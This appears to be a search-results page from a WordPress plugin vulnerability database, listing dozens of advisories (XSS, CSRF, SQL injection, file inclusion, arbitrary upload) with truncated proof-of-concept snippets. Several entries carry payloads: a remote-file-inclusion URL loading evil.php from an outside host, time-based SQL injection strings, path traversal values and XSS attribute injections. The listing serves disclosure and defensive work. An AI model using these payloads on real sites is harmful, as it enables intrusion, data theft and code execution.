14602 matches found
Modal Window < 5.2.2 - RFI leading to RCE via CSRF
The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. PoC http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...
Booster for WooCommerce < 5.4.9 - Reflected Cross-Site Scripting in General Module
The plugin does not sanitise and escape the wcjdeleterole parameter before outputting back in the admin dashboard when the General module is enabled, leading to a Reflected Cross-Site Scripting issue PoC The "General" module needs to be enabled in "Woocommerce - Booster Settings - Booster"...
Hide My WP < 6.2.4 - Unauthenticated Plugin Deactivation
The plugin does not have any authorisation check when outputing a reset token, which could then be used to deactivate the plugin via another request...
Icegram < 2.0.5 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the messageid parameter of the getmessageactionrow AJAX action before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue PoC The XSS will be triggered when moving the mouse over the text in the response...
Easy Registration Forms <= 2.1.1 - CSRF to Stored Cross-Site Scripting
The plugin is vulnerable to Cross-Site Request Forgery due to missing nonce validation via the ajaxaddform function found in the /includes/class-form.php file which made it possible for attackers to inject arbitrary web scripts in versions up to, and including 2.1.1...
Pixel Cat Lite < 2.6.2 - CSRF to Stored Cross-Site Scripting
The plugin does not have CSRF check when saving its settings, and did not sanitise as well as escape some of them, which could allow attacker to make a logged in admin change them and perform Cross-Site Scripting attacks PoC...
Ultimate NoFollow <= 1.4.8 - Contributor+ Stored Cross-Site Scripting
The plugin does not sanitise and escape the href attribute of its shortcodes, allowing users with a role as low as contributor to perform Cross-Site Scripting attacks PoC Affected shortcodes: nf, nofo, nofol, nofollow, relnofollow As a contributor, put the below shortcode in a post/page nf...
Cost Calculator <= 1.4 - Contributor+ Local File Inclusion
The plugin allows users with a role as low as Contributor to perform path traversal and local PHP file inclusion on Windows Web Servers via the Cost Calculator post's Layout PoC As a contributor, create a Cost Calculator post, set the Layout to /../../../../../../../../../../file assuming the fil...
WP RSS Aggregator < 4.19.2 - Admin+ Stored Cross-Site Scripting
The plugin does not properly sanitise and escape the URL to Blacklist field, allowing malicious HTML to be inserted by high privilege users even when the unfilteredhtml capability is disallowed, which could lead to Cross-Site Scripting issues. PoC Add an URL to Blacklist RSS Aggregator Tools...
Logo Showcase with Slick Slider < 1.2.5 - Subscriber+ Arbitrary Media Title/Description/Alt Text/URL Update
The plugin does not have CSRF and authorisation checks in the lswsssaveattachmentdata AJAX action, allowing any authenticated users, such as Subscriber, to change title, description, alt text, and URL of arbitrary uploaded media. PoC jQuery.postajaxurl, action: "lswsssaveattachmentdata",...
Forminator < 1.15.4 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitize and escape the email field label, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml is disallowed PoC As an admin, create or edit a Forminator form, add an email field and put the following payload in the label...
Images to WebP < 1.9 - Multiple Cross Site Request Forgery (CSRF)
The plugin does not have CSRF checks in place when performing some administrative actions, which could result in modification of plugin settings, Denial-of-Service, as well as arbitrary image conversion PoC The PoC varies based on the endpoint targeted. Here is one example that will modify the...
Shared Files < 1.6.61 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape the Download Counter Text settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed PoC Put the following payload in the Download Counter Text settings and tick the Show...
Leaky Paywall <= 4.16.5 - Admin+ Stored Cross-Site Scripting
The plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via the /class.php file which allowed attackers with administrative user access to inject arbitrary web scripts. This affects multi-site installations where unfilteredhtml is disabled for...
Support Board < 3.3.6 - Arbitrary File Deletion via CSRF
The plugin does not have any CSRF checks in actions handled by the include/ajax.php file, which could allow attackers to make logged in users do unwanted actions. For example, make an admin delete arbitrary files PoC...
QR Redirector < 1.6 - Subscriber+ Arbitrary QR Redirect Response Status Update
The plugin does not have capability and CSRF checks when saving bulk QR Redirector settings via the qrsavebulk AJAX action, which could allow any authenticated user, such as subscriber to change the redirect response status code of arbitrary QR Redirects PoC jQuery.postajaxurl, qrredirectresponse...
Job Manager <= 0.7.25 - Admin+ Stored Cross-Site Scripting
The plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via several parameters found in the /admin-jobs.php file which allowed attackers with administrative user access to inject arbitrary web scripts. This affects multi-site installations whe...
WP Fastest Cache < 0.9.5 - CSRF to Stored Cross-Site Scripting
The plugin is lacking a CSRF check in its wpfcsavecdnintegration AJAX action, and does not sanitise and escape some the options available via the action, which could allow attackers to make logged in high privilege users call it and set a Cross-Site Scripting payload...
HAL < 2.2 - Admin+ Stored Cross-Site Scripting
The plugin is vulnerable to Stored Cross-Site Scripting due to insufficient input validation and sanitization via several parameters found in the /wp-hal.php file which allowed attackers with administrative user access to inject arbitrary web scripts. This affects multi-site installations where...
Brizy < 2.3.12 - Authenticated File Upload and Path Traversal
Using the brizycreateblockscreenshot AJAX action, it was possible to provide a filename using the id parameter, and populate the file contents via the ibsf parameter, which would be base64-decoded and written to the file. While the plugin appended .jpg to all uploaded filenames, a double extensio...
WP Cloudy < 4.4.9 - Admin+ SQL Injection
The plugin does not escape the postid parameter before using it in a SQL statement in the admin dashboard, leading to a SQL Injection issue PoC The first digits of the post parameter must be a valid Post ID Weather post or not...
WP Header Images < 2.0.1 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the t parameter before outputting it back in the plugin's settings page, leading to a Reflected Cross-Site Scripting issue PoC https://example.com/wp-admin/options-general.php?page=wphi=5"...
Quiz Tool Lite <= 2.3.15 - Multiple Admin+ Stored Cross-Site Scripting
The plugin does not sanitize multiple input fields used when creating or managing quizzes and in other setting options, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. PoC 1. When creating a new Question Pot, you can...
wpDiscuz < 7.3.4 - Arbitrary Comment Addition/Edition/Deletion via CSRF
The plugin does check for CSRF when adding, editing and deleting comments, which could allow attacker to make logged in users such as admin edit and delete arbitrary comment, or the user who made the comment to edit it via a CSRF attack. Attackers could also make logged in users post arbitrary...
Post Content XMLRPC <= 1.0 - Admin+ SQL Injections
The plugin does not sanitise or escape multiple GET/POST parameters before using them in SQL statements in the admin dashboard, leading to an authenticated SQL Injections PoC https://example.com/wp-admin/admin.php?page=pcxaddsites=add=1%20AND%20SELECT%207953%20FROM%20SELECTSLEEP5AgUn...
Access Demo Importer < 1.0.7 - Subscriber+ Arbitrary File Upload
Versions up to, and including, 1.0.6, of the Access Demo Importer WordPress plugin are vulnerable to arbitrary file uploads via the pluginofflineinstaller AJAX action due to a missing capability check in the pluginofflineinstallercallback functionfound in the /inc/demo-functions.php file along wi...
Perfect Survey < 1.5.2 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape multiple parameters id and filterssessionid of singlestatistics page, type and message of importexport page before outputting them back in pages/attributes in the admin dashboard, leading to Reflected Cross-Site Scripting issues PoC...
Simple Download Monitor < 3.9.5 - Reflected Cross-Site Scripting
The plugin does not escape the 1 sdmactivetab GET parameter and 2 sdmstatsstartdate/sdmstatsenddate POST parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues PoC PoC 1: This requires Firefox due to onclick+accesskey trick on hidden input. There is...
Paypal Donation < 1.3.1 - CSRF to Stored Cross-Site Scripting
The plugin offers a function to create donation buttons, which internally are posts. The process to create a new button is lacking a CSRF check. An attacker could use this to make an authenticated admin create a new button. Furthermore, one of the Button field is not escaped before being output i...
Credova_Financial < 1.4.9 - Sensitive Information Disclosure
The plugin discloses a site’s associated Credova API account username and password in plaintext via an AJAX action whenever a site user goes to checkout on a page that has the Credova Financing option enabled...
Connections Business Directory < 10.4.3 - Admin+ Stored Cross-Site Scripting
The plugin does not escape the Address settings when creating an Entry, which could allow high privilege users to perform Cross-Site Scripting when the unfilteredhtml capability is disallowed. PoC Add an Entry /wp-admin/admin.php?page=connectionsadd and put the following payload in the Address Li...
OG Tags < 2.0.2 - Plugin's Settings Update via CSRF
The plugin is lacking a CSRF check when saving its settings, which could allow attackers to make a logged in admin change them via a CSRF attack...
Permalink Manager Lite < 2.2.13.1 - Admin+ SQL Injection
The plugin does not validate and escape the orderby parameter before using it in a SQL statement in the Permalink Manager page, leading to a SQL Injection PoC https://example.com/wp-admin/tools.php?page=permalink-manager=ID+AND+SELECT+9480+FROM+SELECTSLEEP5EXid...
Great Quotes <= 1.0.0 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape the Quote and Author fields of its Quotes, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml is disallowed. PoC Add/edit a Quote and put the following payload in the "Quote" and "Author" fields:...
Visual Form Builder < 3.0.4 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise or escape its Form Name, allowing high privilege users such as admin to set Cross-Site Scripting payload in them, even when the unfilteredhtml capability is disallowed PoC Create a new Form via the plugin, fill it with any values. In the next step, change the Form nam...
Responsive WordPress Slider <= 2.2.0 - Subscriber+ Stored Cross-Site Scripting
The plugin does not sanitise and escape some of the Slider options, allowing Cross-Site Scripting payloads to be set in them. Furthermore, as by default any authenticated user is allowed to create Sliders https://wordpress.org/support/topic/slider-can-be-changed-from-any-user-even-subscriber/, su...
One User Avatar < 2.3.7 - Contributor+ Stored Cross-Site Scripting
The plugin does not escape the link and target attributes of its shortcode, allowing users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks PoC avatar link="javascript:alertorigin" avatar target='" style="animation-name:twentytwentyone-close-button-transition"...
WP Cookie Choice <= 1.1.0 - CSRF to Stored Cross-Site Scripting
The plugin is lacking any CSRF check when saving its options, and do not escape them when outputting them in attributes. As a result, an attacker could make a logged in admin change them to arbitrary values including XSS payloads via a CSRF attack. PoC...
One User Avatar < 2.3.7 - Avatar Update via CSRF
The plugin does not check for CSRF when updating the Avatar in page where the avatarupload shortcode is embed. As a result, attackers could make logged in user change their avatar via a CSRF attack PoC Click POST /one-user-avatar-avatar-upload/ HTTP/1.1 Accept:...
Wechat Reward <= 1.7 - CSRF to Stored Cross-Site Scripting
The plugin does not sanitise or escape its QR settings, nor has any CSRF check in place, allowing attackers to make a logged in admin change the settings and perform Cross-Site Scripting attacks. PoC Put the following payload in the QR setting: " The XSS will be triggered in the plugin's setting...
Post Title Counter <= 1.1 - Reflected Cross-Site Scripting
The plugin is vulnerable to Reflected Cross-Site Scripting via the notice parameter found in the /post-title-counter.php file which allows attackers to inject arbitrary web scripts...
DJ EmailPublish <= 1.7.2 - Reflected Cross-Site Scripting
The plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $SERVER"PHPSELF" value in the /dj-email-publish.php file which allows attackers to inject arbitrary web scripts...
WooCommerce Payment Gateway Per Category <= 2.0.10 - Reflected Cross-Site Scripting
The plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $SERVER"PHPSELF" value in the /includes/pluginsettings.php file which allows attackers to inject arbitrary web scripts...
OSD Subscribe <= 1.2.3 - Reflected Cross-Site Scripting
The plugin is vulnerable to Reflected Cross-Site Scripting via the osdsubscribemessage parameter found in the /options/osdsubscribeoptionssubscribers.php file which allows attackers to inject arbitrary web scripts...
Simple Matted Thumbnails <= 1.01 - Reflected Cross-Site Scripting
The plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $SERVER"PHPSELF" value in the /simple-matted-thumbnail.php file which allows attackers to inject arbitrary web scripts...
On Page SEO + Whatsapp Chat Button < 1.0.2 - Reflected Cross-Site Scripting
The plugin is vulnerable to Reflected Cross-Site Scripting due to a reflected $SERVER"PHPSELF" value in the /settings.php file which allows attackers to inject arbitrary web scripts...
Konnichiwa! Membership <= 0.8.3 - Reflected Cross-Site Scripting
The plugin is vulnerable to Reflected Cross-Site Scripting via the planid parameter in the /views/subscriptions.html.php file which allows attackers to inject arbitrary web scripts...
WP Academic People List <= 0.4.1 - Reflected Cross-Site Scripting
The plugin is vulnerable to Reflected Cross-Site Scripting via the categoryname parameter in the /admin-panel.php file which allows attackers to inject arbitrary web scripts...
WP Sitemap Page < 1.7.0 - Admin+ Stored Cross Site Scripting
The plugin does not properly sanitise and escape some of its settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. PoC Put the following payloads in the mentioned settings of the plugin: - How to display the...
Timetable and Event Schedule by MotoPress < 2.4.2 - Unauthorised Event TimeSlot Update
The plugin does not have proper access control when updating a timeslot, allowing any user with the editposts capability contributor+ to update arbitrary timeslot from any events. Furthermore, no CSRF check is in place as well, allowing such attack to be perform via CSRF against a logged in with...